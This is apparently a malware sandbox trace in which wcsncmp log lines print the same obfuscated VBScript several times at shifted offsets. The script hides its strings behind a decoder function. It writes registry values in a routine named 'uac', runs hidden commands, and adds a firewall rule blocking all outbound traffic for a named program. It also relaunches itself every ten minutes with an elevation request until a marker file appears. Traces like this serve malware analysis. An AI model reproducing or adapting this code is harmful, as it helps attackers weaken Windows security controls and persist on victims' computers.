bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.016] wcsncmp (_String1="EOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.016] wcsncmp (_String1="OEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0223.016] wcsncmp (_String1="EPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.017] wcsncmp (_String1="PCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0223.017] wcsncmp (_String1="CIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add 